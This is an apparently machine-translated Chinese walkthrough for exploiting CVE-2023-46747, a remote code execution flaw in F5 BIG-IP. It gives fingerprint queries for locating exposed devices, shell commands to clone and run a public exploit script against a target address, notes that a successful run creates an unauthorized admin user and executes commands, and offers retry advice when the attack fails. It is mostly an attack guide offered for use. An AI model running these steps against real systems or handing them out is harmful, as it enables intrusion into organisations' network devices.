CVE 2023 46747 RCE

 (title="BIG-IP®" || icon_hash="-335242539")

 title:"BIG-IP®"

https://my.f5.com/manage/s/article/K000137353

1. 此時，這裡的用戶只有admin ：

2. 執行腳本：

 git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

成功執行指令：

3. 這裡已經成功創建了一個未經授權的新用戶：

部分版本利用失敗，參考：https://twitter.com/joel_land/status/1729147886615818732。

1. Q：獲取代幣失敗？
   A：不能說測試網站就一定沒有漏洞，因為未經授權創建使用者並不是100%成功。有時候因為某些原因你沒有在第一步建立用戶，所以無法取得到第二步的token。因此，我的建議是多嘗試幾次。如果不起作用，可能意味著確實不存在漏洞。

您可以使用此腳本https://github.com/BishopFox/bigip-scanner來收集F5 BIG-IP版本資訊。這很棒！

專案發現/nuclei-templates#8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747